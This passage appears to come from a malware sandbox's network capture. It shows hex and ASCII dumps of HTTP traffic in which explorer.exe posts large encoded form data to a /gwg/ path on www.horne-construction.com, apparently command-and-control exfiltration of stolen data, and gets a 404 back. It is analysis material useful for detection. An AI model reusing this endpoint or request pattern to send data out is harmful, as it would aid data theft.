Nov 28, 2020 10:26:01.155551910 CET	7777	IN	Data Raw: 1e c1 d3 ae 20 16 ca b4 24 32 22 da b3 6d 8d f7 77 22 74 d3 34 55 32 19 4f 85 d0 20 37 a9 dc 2a f1 82 06 21 e8 71 2c 45 90 f8 7a 9c c6 2c 44 70 7a 61 4d 97 69 87 7e 0a 2c e5 71 a2 bf a4 d9 3b 8d 8c c7 f7 1b b8 64 b2 6c 8d a3 26 d6 7b 3c 89 26 20 Data Ascii: $2"mw"t4U2O 7*!q,Ez,DpzaMi~,q;dl&{<& '!f+d^g=T5WU/bzZ:d.6ox@dP\|!Rgj3}xT{(\|L!zk`c#TMLa{/FVF@td@5EOBqm#g&8i\|[
Nov 28, 2020 10:26:01.155574083 CET	7777	IN	Data Raw: 3f ba 85 a2 0d a1 d7 e8 16 80 4f a4 5b 2a ba 37 87 12 a5 95 57 d5 c5 b7 1d cd 46 b8 bd a8 16 fa 36 c4 6e 52 2d e0 9e 46 b5 d4 71 5f fa 25 46 c6 a9 8c 6b 8a f2 90 81 97 a5 4a f3 6e 34 2f 0d 10 4e 27 6e 2a 89 cc db 6b 84 a7 8c a8 99 79 c9 53 fe 57 Data Ascii: ?O[7WF6nR-Fq_%FkJn4/N'nkySW"L=554Qck}$wP`MVlkP+dNZUVWK=Uag<j?T/P2"!XjgNG)nV.]cZFQR)Jam,
Nov 28, 2020 10:26:01.204116106 CET	7804	IN	Data Raw: 37 65 37 0d 0a cc 5c dd 6f db 36 10 7f 76 fe 0a 56 7d e8 36 8c 96 e5 af 26 9d a2 21 48 0d 2c 40 9d 06 49 ba 3e 14 45 40 5b 74 a4 44 96 34 4a 8e 92 0d fd df 87 e3 87 44 4a 8a a3 62 4e 33 bf c8 e2 c7 dd 8f 77 e4 91 92 ee 6e 8b cb be 78 8c ca c2 bb Data Ascii: 7e7\o6vV}6&!H,@I>E@[tD4JDJbN3wnx\|g*<>@7t+6=t?EDbB%uDl.DP_<sOdv6^HP4<vR1v`pyDy
Nov 28, 2020 10:26:01.204149008 CET	7805	IN	Data Raw: 41 63 43 27 da 64 2d 7b 6b 53 10 4e c6 44 46 09 29 c1 70 4d e8 03 d5 83 87 54 23 45 4c 4c 3a 75 a7 ae c6 dc 55 d1 46 b2 ab 6a a3 ae 82 5d fd 4c d8 34 e0 86 04 cc ce f2 98 65 4c 21 68 51 16 88 83 4d 6d 92 19 2d e0 c6 0d c6 de 19 6c 1c e8 94 47 10 Data Ascii: AcC'd-{kSNDF)pMT#ELL:uUFj]L4eL!hQMm-lGv0T")hP~wMM)6\3vxZXC'NUTarvTyV.;n6fi3;1g@0mshjN!{,s$'\Mk:>j5:?"K2!V*5
Nov 28, 2020 10:26:01.255434036 CET	7806	IN	Data Raw: 37 33 33 0d 0a dc 5d 6d 6f e2 46 10 fe 4c 7e c5 ca 27 35 17 e9 1c bf 00 81 5c 1d aa de a9 ad ae 52 9b 56 ca f7 c8 18 27 b8 31 36 b2 4d 20 ff be 9a 99 7d f3 0b c6 27 20 9c f8 14 62 2f b3 b3 cb b3 e3 d9 67 c6 b3 15 67 c9 b3 12 1f e9 57 e5 c9 a0 5b Data Ascii: 733]moFL~'5\RV'16M }' b/ggW[M1>N?(AAWJVFU%YDr.eG6Yfa2"23d.M^2Mcw(*?[rI;M
Nov 28, 2020 10:26:01.255460978 CET	7807	IN	Data Raw: a3 f8 72 e2 51 9d b2 8a 30 b4 a0 97 e8 80 68 d3 25 ba c2 04 65 38 a8 72 96 07 fe 32 a4 76 32 eb 6f d7 cb 54 a1 39 5d 45 f1 cc 7c 03 db 99 c0 51 87 3a e3 6c d6 c8 18 eb 72 e2 45 8b 67 86 a7 d9 dc 19 ce d0 36 18 1d 79 c3 ff 81 37 b8 f0 14 c1 d6 74 Data Ascii: rQ0h%e8r2v2oT9]E\|Q:lrEg6y7tzjevtn:C{mIL6Wk0?.^/;LS7}g]`4FCs6KA9C{bm?oF}/c?!?*xdx7yzTTk_07wp@
Nov 28, 2020 10:26:01.279953003 CET	7808	IN	Data Raw: 34 63 32 0d 0a ed 9d 5d 6f a3 46 14 86 ef f3 2b 46 b3 6a ae 82 01 27 d9 4d 1c 1b b5 89 5a a5 17 e9 56 d9 f4 a2 57 2b 6c 8f 31 0d 30 88 c1 49 b6 bf be 7a cf 7c 30 38 4e ca ae 5a b9 52 73 11 89 b1 87 73 86 61 80 e0 f3 9c f7 74 a4 c0 76 64 64 bf 81 Data Ascii: 4c2]oF+Fj'MZVW+l10Iz\|08NZRssatvdd#=tQ~JJKSp=N<c)'V#?8F^e!O.Dstv;wnE%diY_[pDs^SnxkD%-r]~n-x'm
Nov 28, 2020 10:26:01.279988050 CET	7808	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49758	198.20.71.158	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2020 10:26:01.032037020 CET	7773	OUT	POST /gwg/ HTTP/1.1 Host: www.horne-construction.com Connection: close Content-Length: 150725 Cache-Control: no-cache Origin: http://www.horne-construction.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.horne-construction.com/gwg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 70 50 55 3d 68 72 67 59 4d 62 4d 7a 79 66 37 66 4a 6a 59 4a 44 79 79 4c 7a 51 36 35 35 72 33 34 6d 6c 57 67 42 5f 51 37 55 4b 30 47 70 74 34 65 57 41 70 5f 54 39 37 57 77 6f 4a 6d 55 4a 39 53 41 51 4d 4e 65 66 33 49 74 65 4f 6c 4d 41 49 54 6c 58 54 4d 48 68 36 6e 37 6b 41 77 66 33 74 71 73 39 77 6b 46 6a 36 2d 6b 4a 6f 7a 63 51 4e 38 45 53 42 52 74 70 5a 50 51 70 70 51 32 65 53 4c 6f 43 41 4d 69 7a 49 6b 52 35 31 68 6c 65 6e 48 6b 38 68 34 48 54 6b 30 65 67 6d 44 4c 4a 4c 70 28 44 72 42 4b 63 53 4c 46 5f 46 5a 37 75 73 31 72 42 48 6a 69 69 38 53 47 52 54 46 69 46 42 49 65 6c 71 35 56 57 4f 43 45 74 5a 69 4a 73 33 6d 7e 39 55 52 69 7a 33 32 77 50 61 7a 79 6e 32 43 52 6f 66 61 6a 6b 69 53 66 38 6f 43 67 76 66 33 36 32 55 33 6c 58 49 4d 42 34 4a 49 68 7a 45 34 71 58 71 6c 63 35 33 4d 59 42 57 68 31 68 28 5f 4c 37 42 49 48 58 4a 75 72 69 41 6b 71 71 74 6a 41 70 79 5a 70 2d 65 46 7a 67 56 4c 65 71 38 56 6b 76 35 55 76 4c 46 4b 62 6c 6e 58 66 72 63 5a 76 45 72 6b 58 47 32 59 37 70 6b 7a 76 57 35 6f 7a 76 6f 30 68 41 66 42 37 32 62 72 43 6b 44 57 7a 77 52 54 6a 46 34 76 4c 66 6a 6f 5a 6e 73 66 45 53 7e 51 78 48 70 57 30 31 61 4f 64 78 32 4e 52 6a 42 59 35 64 6a 6b 33 6a 39 73 45 72 54 6f 77 45 78 43 63 42 7e 58 7a 4c 34 33 30 6c 42 46 69 69 47 41 42 65 39 48 62 4d 32 74 39 76 4d 51 6a 4d 59 79 73 66 41 59 47 45 41 56 54 7a 4b 56 77 58 73 55 51 69 65 4d 44 55 4c 68 78 63 47 53 41 6e 62 33 53 75 46 34 7a 5a 34 51 69 53 74 71 7a 6e 53 4d 69 37 48 55 6c 4b 63 4d 70 41 38 64 4a 59 68 5f 43 53 45 77 6e 37 53 6c 39 62 57 61 33 5f 78 33 75 39 33 61 6a 6f 31 33 7e 79 65 2d 78 64 4c 4c 6d 59 30 4f 53 64 42 68 50 50 74 51 64 69 30 58 73 4d 6c 57 69 66 5a 58 4a 48 68 33 42 64 6d 36 62 58 45 5a 78 74 4f 41 7a 37 32 31 76 39 63 5f 61 43 39 79 68 4a 69 45 4d 73 53 43 75 50 65 6d 41 69 74 75 4a 75 6e 52 28 68 68 67 67 7a 37 69 76 31 63 52 42 66 28 61 37 32 77 6d 32 5f 78 56 6c 6a 35 34 57 4e 50 50 78 75 63 69 42 6c 75 6a 43 6e 46 37 64 61 4e 77 7a 66 71 70 71 5a 6c 79 35 52 4c 72 70 6c 64 57 4e 41 36 63 54 75 52 71 74 4d 53 47 37 6d 6c 48 35 72 53 41 6e 55 5a 4d 4e 30 5a 44 64 6f 55 53 5a 6c 7a 69 7a 44 47 68 6e 39 63 47 30 59 63 32 45 30 36 50 53 5a 41 38 4c 79 49 61 68 47 4c 78 4d 4c 4e 44 32 69 7e 53 69 49 6a 46 79 41 30 55 56 31 71 79 6d 67 4b 62 6b 6d 32 76 56 42 75 65 68 32 55 33 71 34 46 70 66 42 64 77 70 7a 6c 75 5a 58 75 35 69 58 78 33 76 68 51 37 43 70 6d 71 6a 31 47 79 49 6b 56 4c 49 33 33 4e 59 76 57 59 63 49 36 72 56 38 45 6d 5a 46 33 64 73 6b 76 4e 55 50 4f 51 44 37 56 5a 74 66 6b 67 44 51 6e 61 6f 73 44 64 30 50 33 79 68 51 7e 42 73 39 71 38 7e 46 46 65 73 72 28 32 65 77 7e 46 44 45 70 72 57 61 5a 59 38 67 47 36 75 43 35 6e 56 41 51 73 32 69 53 72 39 5f 67 78 57 71 77 4f 65 5a 39 77 43 62 66 75 6f 6b 4f 67 4e 68 4e 65 33 71 61 69 63 4d 36 6d 6f 2d 4f 36 51 6a 54 64 74 38 31 31 43 59 53 6a 37 50 43 47 45 6a 70 73 28 56 33 32 46 64 45 42 47 43 71 31 73 68 63 6f 44 54 68 7a 76 37 62 5a 32 6f 68 52 61 31 35 39 54 6e 28 71 33 72 72 79 6d 4b 79 59 70 69 71 4f 45 74 6b 38 44 6a 42 64 28 6c 49 62 61 41 50 38 34 46 7a 72 31 77 75 67 59 62 6e 50 78 56 73 41 72 6d 4c 4d 7a 72 34 35 4a 68 67 4c 43 59 77 32 70 4b 72 39 75 6d 6e 44 4e 4f 70 61 4f 63 77 43 42 4c 49 70 42 74 65 63 78 6d 39 39 76 71 77 61 75 6e 48 6d 61 41 50 64 70 65 4d 4c 71 66 30 37 4e 63 6a 33 4e 64 47 55 56 57 41 6d 33 70 28 4c 74 59 46 45 79 72 31 6e 32 32 6f 52 69 61 37 48 45 43 66 72 33 61 4d 4e 72 53 47 58 4f 2d 56 73 57 78 46 37 30 4c 4a 5a 39 59 66 4c 65 5a 4d 34 7e 70 63 4b 37 33 4d 51 56 48 7e 6c 62 70 78 5f 36 31 6c 37 68 66 75 4c 39 78 48 36 75 53 75 35 45 41 75 62 35 67 61 4e 53 4b 38 63 32 30 43 50 42 54 37 36 39 56 76 79 28 6d 44 52 77 39 33 46 61 6b 6a 6a 74 65 69 7a 5a 45 42 2d 30 79 6c 73 48 47 46 4a 63 52 35 39 71 65 45 36 56 58 58 57 54 31 56 4e 46 65 43 53 4f 42 4d 4b 57 67 6a 6c 62 32 32 32 6d 4b 4e 48 64 71 51 4b 41 63 55 67 55 67 62 4a 65 61 53 53 7a 4d 4d 43 73 2d 78 73 53 6e 50 39 35 4f 36 76 71 48 52 2d 73 67 78 66 32 67 7e 75 36 4d 31 32 54 6b 56 6f 67 39 74 6f 4c 7a 7e 41 75 58 65 49 6f 7a 61 49 77 4c 4d 56 76 6d 79 2d 44 57 6e 71 52 47 73 Data Ascii: pPU=hrgYMbMzyf7fJjYJDyyLzQ655r34mlWgB_Q7UK0Gpt4eWAp_T97WwoJmUJ9SAQMNef3IteOlMAITlXTMHh6n7kAwf3tqs9wkFj6-kJozcQN8ESBRtpZPQppQ2eSLoCAMizIkR51hlenHk8h4HTk0egmDLJLp(DrBKcSLF_FZ7us1rBHjii8SGRTFiFBIelq5VWOCEtZiJs3m~9URiz32wPazyn2CRofajkiSf8oCgvf362U3lXIMB4JIhzE4qXqlc53MYBWh1h(_L7BIHXJuriAkqqtjApyZp-eFzgVLeq8Vkv5UvLFKblnXfrcZvErkXG2Y7pkzvW5ozvo0hAfB72brCkDWzwRTjF4vLfjoZnsfES~QxHpW01aOdx2NRjBY5djk3j9sErTowExCcB~XzL430lBFiiGABe9HbM2t9vMQjMYysfAYGEAVTzKVwXsUQieMDULhxcGSAnb3SuF4zZ4QiStqznSMi7HUlKcMpA8dJYh_CSEwn7Sl9bWa3_x3u93ajo13~ye-xdLLmY0OSdBhPPtQdi0XsMlWifZXJHh3Bdm6bXEZxtOAz721v9c_aC9yhJiEMsSCuPemAituJunR(hhggz7iv1cRBf(a72wm2_xVlj54WNPPxuciBlujCnF7daNwzfqpqZly5RLrpldWNA6cTuRqtMSG7mlH5rSAnUZMN0ZDdoUSZlzizDGhn9cG0Yc2E06PSZA8LyIahGLxMLND2i~SiIjFyA0UV1qymgKbkm2vVBueh2U3q4FpfBdwpzluZXu5iXx3vhQ7Cpmqj1GyIkVLI33NYvWYcI6rV8EmZF3dskvNUPOQD7VZtfkgDQnaosDd0P3yhQ~Bs9q8~FFesr(2ew~FDEprWaZY8gG6uC5nVAQs2iSr9_gxWqwOeZ9wCbfuokOgNhNe3qaicM6mo-O6QjTdt811CYSj7PCGEjps(V32FdEBGCq1shcoDThzv7bZ2ohRa159Tn(q3rrymKyYpiqOEtk8DjBd(lIbaAP84Fzr1wugYbnPxVsArmLMzr45JhgLCYw2pKr9umnDNOpaOcwCBLIpBtecxm99vqwaunHmaAPdpeMLqf07Ncj3NdGUVWAm3p(LtYFEyr1n22oRia7HECfr3aMNrSGXO-VsWxF70LJZ9YfLeZM4~pcK73MQVH~lbpx_61l7hfuL9xH6uSu5EAub5gaNSK8c20CPBT769Vvy(mDRw93FakjjteizZEB-0ylsHGFJcR59qeE6VXXWT1VNFeCSOBMKWgjlb222mKNHdqQKAcUgUgbJeaSSzMMCs-xsSnP95O6vqHR-sgxf2g~u6M12TkVog9toLz~AuXeIozaIwLMVvmy-DWnqRGs7X_GQ(LMa(QfPb8wZ2H99~SE5aDmqwf7-BiB6c9xdXX~4(rX504iZ~ryigRT3l3U5ujNk2uJa4jeTp9B7OLQ1sW1n(nlsNzZZrnelXVwiyr0bs4nP6HTk(BXxkIXzzBWfpHprg5YBq1jn1xKoMqQ31KsnKMPJvvyh3nh_KfIIXWXkXHIlhSGfu6f7yl6Bx4Ga0AB45h7fX43TqmByQYgYf3iFvTulLB4UHhP_3gKuShfm~jvUWH~K1gTo5cozrxAESOvQUR(JprsYwWc1rYiq46UbK0KuZKbHv9cp4jFb6NzKpfxnOt8mSPpTzuOjaXqZcG(qH9caYMWRB5uMEcZZfh5lSrip7zVvKIvDi5(PyUjgwUvfZ9vPvJjmp1GCc8UTkorreSJIVduenHhOtgU8gh5HWSpRvt3-8lLU697V1QiBkHVHx2qOH8vTOtBpMj~kCr(I6YY43A1hnBcorbJzhFKEEp33jmr_mMeIzq(8RVFIH4INpZcieyAZ~qaGRS1JESeL~BpXBmvJdfB0VZ8aP1MrnYnTJBt9ye93A9Ssd9yuj_nlmJmrXFIFdkXBAAAg6EkV8vfiImah9ikZwllnuFsD0r(hkjWcyRG1FNuvuDLB5_KWsmko2iwWOHvagPOMrx0VrOQRTZBJmWwn~2F7~eMXP9U2QMyKaTGuLbyx8olmrYOtd4qgHRYmgdkNla9s2UPPHJmk2UMme5Wl2VW9DRScw9FYRkm_9W0isUAApQIMaoxG23YodiZLLCztt1mqjUQ-Xm~pwRKhSVVmv_zv2TCOZkgmv1xXirYF8oRk3rpPCSRT6fAKcdYJtTkM6cGqeqWDYjIcDH6BZPG3GVMWHsNVED9v9Fp59yuJD4a8lv7LyKoqhy1Yny9OZ9pUAZ2-HOa4WH2gp_BrBP6GgErisS89zryCPnh6iMZcl8UzXKg5mSB_AnD3XjmeQ5cnR_NSmKJVni~7TeD4dc06T4CwE7nt43yGKB15joC2N3f6V19LZTCppgk3VcsAB3Nv5yEQxKJLFi9lgER3BCmmUriqKVsjvdfKvkqF3vT4Bg~Nrik3Mlj-~459LMi2XetIFV(rii9PSJtGJqv2Gt4YOxxe7gHjqBcHcZIR7c3caa9qET9uSEEhQIxlRDdrrGgwJQCfHooSzw8Kh8h3B_LZI7lnBhxzqe9HSjry8XvOV00GOH~JwIulT3PwlRe-Zj0-f6JwAqaalsrOtfXTIaSxZQx2qb8seF1BHPG-A2aHk08UEw(Jd1LllK9iwSOK0NW-SlzwBKlgJPuoGd9XcMOvM-AcVZ48gqgcI8FnVB6Rt5gu5hVi07OEIjw8MtAqAOuB35(ceEAD9xduG5AH0GkBUOc1ef8_9hGD7mcpnfT5K2qDoluLdIDHtAaegBKNlg4sB2iURhKKTayk75El~yDgXV4xfqa0ne~JtRs3LhQbZ-vO39nxToXzu6u06iwNo2WCi7NYpoASlLHRGb9ctjeLVFufcxnqh76ZbRd6uvWrMRaSFxb6tgm0zLnhR92mV58g6ZiiHrtp9yvFgM5NzstqL7lXq4Kj5O6uflxhtUSa6T1PN7ilobFDvqV6nhDKBx~0Ko9yLW~mU6fanlgy7W7XGFXJ6j6PhqFp4lsv~qtAe4FpnTyxxeivcY1vqjDeUtgkE928gIcitYllh1BLspROoTRI6qCHJtCxLWt0589lcqQK(cEJfXnkvDG9pzaOE8FosquNvlv4hlAG6rQsFYOSr6oR7V1fng6EXglJCI9MKbMjxZu129BnodTqwY~OPthOq2OdIJtyeT6JVEOXmKItrfUXAyUVY53-E51sYOlkIBVI3kFNLpKa5W4F~lPGhLQBA31yVXsKrTkbaF~QPmgT8k(oTFbLhba92Sd9IJF-VyAmcygQDfesrVCjfrJ0GqHAXuRvQ2jdYY43p6zn16xORTdHIHXW2MLnjiDYJc7JcNiQRW4ZSvsfU3J6KqhlrMK9f76s5kpzk84-qPAnqceWVPm0QMbWbwXSjtYWrmgtLR0Ym0UUVpTHazAGkw9H7X2zd2TQB8NRKa7fARJRFHgcaWwrL-Qo8Cyj46mt6Ah_umHcYyewNvk2aA7LhSL8fn8fY1xptDqt(kXZVPwb8NYBZcmHW81ATAgr~Mwd2t6QMbi3hUrM3olt6lege5iVMkprV1c3sNjNVSMyesFyzyLc7cMW9suAeBqWj0tDmJLTOBD7nxpLvj6E5VqQQEg1TmGWIQgfnZol3Ej7v0(3YDllinqjpnEm8oXEgc1Y3KfdQz7XVE(jOMgI2S1prLeGpW3mCfYH9DAEZKA8GeIblxLeImCM5mO95luhxOxpKFsD0TwtsbUE0bL-RDT-Pai_o7msC-M9YcCXj08TxDF3(QP956vze2xEXqepYn~rNQE1YEMo58la~0lgMFY0DuUmR9ckByXj7no4CSgf7R~PDIOE11Zf6JydRMgN23p8kukRmKdGxQqO4tJnnGMhUDI4wUVBPZhfSPYAhMT-aJNtE_zOwhwSdGFIrsDv2h69F7SCPaiGPUaQMq6hGmkVts9j0EpFmuh5pCqD22RKgrWGQLNR4gkukmqKMKEWfcvXA24StdzETB9UIbZH6m3CNS(_ZmDosF0enIDMiN8Uk4BuZqjZZiT2FvPhFDBgtYEaHPQ5Eyv1NcKbIy0BWYqw9hSuvksS5i1Uan~VlFpnIpWtQGGlX07BMR37ALvGoojdJB
Nov 28, 2020 10:26:01.193900108 CET	7780	OUT	Data Raw: 53 4e 6b 64 46 6d 36 4e 4c 37 37 7e 78 65 61 39 70 37 6d 58 45 50 36 4a 44 63 36 6d 6c 57 61 74 33 4c 75 68 32 56 33 6c 48 31 6d 41 61 39 37 50 77 4f 47 4c 42 38 42 41 51 57 4a 4b 56 71 76 4a 77 74 47 58 31 6e 63 37 55 30 56 5a 73 44 47 75 6e 6e Data Ascii: SNkdFm6NL77~xea9p7mXEP6JDc6mlWat3Luh2V3lH1mAa97PwOGLB8BAQWJKVqvJwtGX1nc7U0VZsDGunnDvCC1aotV(hsKZtR3DuYNxwKaj1L1a1z772my8KDMcSrD9_qglkknDHa5SUroCma4oABTJChGIT3hvnJdssK72zwuwn5-OafvEtduKxClidkn1QgD9bP4SpmUuhesbJnltuVvjqw5(-3008VjHtW-6lB0hdLU9DxU
Nov 28, 2020 10:26:01.193974972 CET	7803	OUT	Data Raw: 61 62 6e 6a 37 38 6a 43 4e 6c 7a 34 71 42 4a 59 71 41 68 75 4c 6f 6a 6d 50 53 48 46 66 4d 43 4d 77 6f 49 6d 66 37 4c 66 51 71 57 76 73 45 66 34 72 77 78 54 64 54 67 74 57 49 59 68 52 53 44 4f 58 6e 31 66 73 71 31 28 51 79 76 55 5a 76 59 41 68 54 Data Ascii: abnj78jCNlz4qBJYqAhuLojmPSHFfMCMwoImf7LfQqWvsEf4rwxTdTgtWIYhRSDOXn1fsq1(QyvUZvYAhT1Zq5-s1OzeNpRq0B9kB9s4WMykBMjWy2kF-GPMvGZ(1dbcu4HEvTBLBCcciUw3kAAtJ2XbSiRYrC7UEAgbxJtmAksAcaKzIKx8TcMVTH3nQrOuqMQHJbzNpGDVKIYNr98K1JPnr1BjjCXRwYFj15BM-AdpodRXe1s
Nov 28, 2020 10:26:01.355931044 CET	7814	OUT	Data Raw: 6f 78 6a 68 65 64 6c 6a 44 7e 42 58 43 4b 39 6d 36 71 36 37 6a 51 76 43 30 34 78 47 59 5a 36 52 38 33 58 28 42 32 6d 51 51 76 35 67 74 78 68 78 6c 4b 5a 36 4b 36 37 66 33 76 75 4f 54 36 78 31 66 74 67 75 54 56 43 77 36 70 61 42 49 37 45 61 39 53 Data Ascii: oxjhedljD~BXCK9m6q67jQvC04xGYZ6R83X(B2mQQv5gtxhxlKZ6K67f3vuOT6x1ftguTVCw6paBI7Ea9SVFNb2EpjK0uL2~opVwA3DrJtw1XRJdUm-vDRPulkBZuZlTtZosacLjk(iUX7qiOyCpn4Wv0r5sPRIV8zET43GjyiwIFO2vI95SpebEGv4l4rLJecs6SyKGGCC(7hpwF19RVM9hAOLKWj3KlPG41tnce0UOJf0Q4KB
Nov 28, 2020 10:26:01.356028080 CET	7851	OUT	Data Raw: 5a 72 6f 77 63 50 45 69 36 48 37 4c 51 39 5f 72 4b 66 4c 6e 52 30 38 56 43 7a 32 79 68 7e 6f 56 56 4d 79 55 39 71 57 4e 6b 4c 62 48 7a 4e 50 34 69 63 39 39 7a 43 6d 65 55 28 4e 75 57 66 79 71 6f 79 4c 64 4c 58 4a 56 62 63 66 55 33 7a 52 34 7a 59 Data Ascii: ZrowcPEi6H7LQ9_rKfLnR08VCz2yh~oVVMyU9qWNkLbHzNP4ic99zCmeU(NuWfyqoyLdLXJVbcfU3zR4zYbzLCGvqZHiHJR9JvigtHUv5RNRp2ahzyzUVdHBEnsGRiscX4H4bY3cEH6n-Mg(OXAntSJn1Ak0oqiahImoVdjy0Ub5AUvUjqrThTcCE~Zpl84x8U9ZNF94EBKNitLrlUAgMUFSN6p2hklHIF7n9IMGa02gExRy8iR
Nov 28, 2020 10:26:01.517836094 CET	7856	OUT	Data Raw: 70 61 47 67 56 6c 74 6b 76 74 6b 72 63 65 35 59 54 5a 6d 28 76 59 2d 63 74 68 67 67 75 4f 51 64 52 78 7a 7a 62 41 67 7a 70 79 6c 4a 4b 36 72 75 6e 49 56 6e 51 47 4e 77 38 49 66 28 6c 28 5f 65 32 72 6f 73 76 4d 77 48 65 44 4a 74 2d 6f 70 64 75 34 Data Ascii: paGgVltkvtkrce5YTZm(vY-cthgguOQdRxzzbAgzpylJK6runIVnQGNw8If(l(_e2rosvMwHeDJt-opdu4liwIVM278cXXGdOCMvJlq5k1xvGA88UsIDqw7ZkDFn9s_cZ6jw6FZ5OIWIzDzCBNECTCb7f962sy96GafP1FUhLqieYOu(XBbgxrByHgWjOUslICQuuk19pE-b45GcSxjfEW3fOs3J584BQti6XqYn2c7ACGXiG7K
Nov 28, 2020 10:26:01.518102884 CET	7875	OUT	Data Raw: 4f 63 75 74 6a 7a 35 42 75 57 4a 72 57 58 72 4b 73 58 46 37 4c 67 72 4a 47 6d 6a 6f 4a 35 76 67 62 76 52 48 4a 37 6e 47 55 7e 5a 35 6d 67 48 57 6e 55 36 5a 34 44 71 78 71 59 4d 72 54 56 74 51 65 4e 64 44 46 37 7a 6e 64 70 79 51 74 73 73 52 62 68 Data Ascii: Ocutjz5BuWJrWXrKsXF7LgrJGmjoJ5vgbvRHJ7nGU~Z5mgHWnU6Z4DqxqYMrTVtQeNdDF7zndpyQtssRbhQx7Zm20CUOiZ2Qwfz6PJm0-Un7akrsAxXtX4gzOaB5H~1WKh_S65CzeUTuHnQSeeCIYC-UrCjRhumVBXlEJb5aHO_r0RKv-VNUlJ126nvIJh4jmDoVJFCt0IRtAIP~TTJsPHHSCKQVWarLipOm_Oq8OwCftNT(QKE
Nov 28, 2020 10:26:01.518173933 CET	7878	OUT	Data Raw: 37 59 74 79 5f 71 44 48 50 37 74 71 67 6d 66 4b 33 54 6e 6f 33 66 54 67 68 49 34 50 73 6b 58 37 51 34 6b 65 59 6a 5f 58 66 4e 57 79 58 56 35 75 36 67 42 65 53 37 37 53 45 42 4d 67 74 58 65 50 79 28 6e 46 31 63 57 70 6f 36 31 34 39 6f 37 4f 79 50 Data Ascii: 7Yty_qDHP7tqgmfK3Tno3fTghI4PskX7Q4keYj_XfNWyXV5u6gBeS77SEBMgtXePy(nF1cWpo6149o7OyPzNekxcU7T7gh44mB9(2pxveqKCbaS4TcGIfQxXms8cIG1VcIZD9Qc(cc38eKthd2Xt7QuE39Eh0EugkaRgBJV2HmSj-Clbwi7377ROiPTUfMTq0HRYHYT3PKWXC4Q6O4r~MO0yMIINfRKOMdvyWAISZOAjFQeeYuu
Nov 28, 2020 10:26:01.518275976 CET	7899	OUT	Data Raw: 51 44 4c 43 32 6f 70 57 71 4c 4a 61 53 65 4e 69 53 38 77 54 4e 63 36 56 31 59 6a 53 70 57 63 72 62 63 39 35 63 64 47 54 51 53 5a 6e 78 58 77 63 78 79 32 54 5a 62 48 4c 57 39 75 33 46 38 50 42 6a 67 62 51 6c 77 33 68 73 6c 55 51 76 61 75 63 44 62 Data Ascii: QDLC2opWqLJaSeNiS8wTNc6V1YjSpWcrbc95cdGTQSZnxXwcxy2TZbHLW9u3F8PBjgbQlw3hslUQvaucDbhHqHx7B6aV19UkFKF5AezdkbRdJaimtQbDWHMxgBaHc2WgFucRusM5vXmZ1QuCIBMD-qE0NRu2UhrLBgkMQGp9THheK7d~O(KF9Vjm4VcxKZce3ikp3aguFb1C1XxtBgjQXETZ67vNc4mlRr7OWNDbKSd7roZAKdF
Nov 28, 2020 10:26:01.518409967 CET	7910	OUT	Data Raw: 78 36 46 66 5f 4b 49 70 4e 6a 54 49 72 34 68 33 62 6d 54 53 4e 64 5a 7e 4a 6b 4d 34 5a 30 6b 36 31 69 6d 55 5a 4b 35 43 44 4c 58 7e 44 49 6d 61 32 67 52 33 78 52 71 6e 59 4e 71 50 49 65 77 4a 72 74 56 4d 41 32 73 28 43 47 77 28 63 64 33 55 62 4c Data Ascii: x6Ff_KIpNjTIr4h3bmTSNdZ~JkM4Z0k61imUZK5CDLX~DIma2gR3xRqnYNqPIewJrtVMA2s(CGw(cd3UbL5bNGNp9eT2zvylRcE5x4wcfyKSQDZusLGMCn9CWQXrf1HEfMLAxMUifahsj1-8Q97N2wUTt6pkb~cRf(NbGyJ7g1OXlwnbCvTZ9NNkhFcgsoFJlN-9fCTMZSjpBiUvhACmtJfW3GDZLha1dRo5S(f0VPBzuOrRsCo
Nov 28, 2020 10:26:01.679677963 CET	7915	OUT	Data Raw: 78 6f 4c 6f 66 74 71 47 48 33 5f 74 63 46 72 4b 63 48 76 37 6e 46 71 49 61 70 56 77 33 38 38 69 70 58 56 4c 35 43 30 43 45 37 53 43 44 30 37 5a 34 69 41 4b 6d 42 6a 39 44 52 79 79 58 30 39 7e 62 51 4e 66 6b 71 57 46 57 30 47 62 57 57 78 4d 58 72 Data Ascii: xoLoftqGH3_tcFrKcHv7nFqIapVw388ipXVL5C0CE7SCD07Z4iAKmBj9DRyyX09~bQNfkqWFW0GbWWxMXrUr-B37jqGoMMHaEUrRP2XGJM1W2ziRpjZGWYh6PsrmgrX6r8NR1Gc2SSNu7jKvnIeozcMOb8eJ53lwmI1S2~GzG4Q0-i5IBYwOQVZ5EHHSdtk~ZdxMXfKUkPwvTTD6xTe8k8kTqJ0A4EpmK1CjhKbQjygzXMBG_yG
Nov 28, 2020 10:26:01.957648993 CET	7921	IN	HTTP/1.1 404 Not Found Connection: close Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://horne-construction.com/wp-json/>; rel="https://api.w.org/" Transfer-Encoding: chunked Content-Encoding: gzip Vary: Accept-Encoding Date: Sat, 28 Nov 2020 09:25:59 GMT Server: LiteSpeed Data Raw: 66 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3b d9 72 db 38 b6 cf f1 57 c0 4c c5 96 a6 49 48 96 d7 c8 96 7b 32 ee 74 dd 5b d5 9d 4c 65 79 4a 5c 2a 88 3c a2 d0 01 01 36 00 6a 29 c7 ff 7e 0b e0 4e 51 8b dd c9 cb cd 8b 45 e0 ac c0 d9 c9 dc 1c 06 c2 d7 ab 18 d0 4c 47 ec f6 e0 c6 fc 41 8c f0 70 e4 00 f7 3e 7f 74 cc 1a 90 e0 f6 e0 c5 4d 04 9a 20 7f 46 a4 02 3d 72 3e 7f fa dd bb 72 8a 75 4e 22 18 39 73 0a 8b 58 48 ed 20 5f 70 0d 5c 8f 9c 05 0d f4 6c 14 c0 9c fa e0 d9 07 17 51 4e 35 25 cc 53 3e 61 30 3a b1 54 18 e5 df 90 04 36 72 62 29 a6 94 81 83 66 12 a6 23 67 a6 75 ac 86 bd 5e 18 c5 21 16 32 ec 2d a7 bc 77 62 90 0e 5e 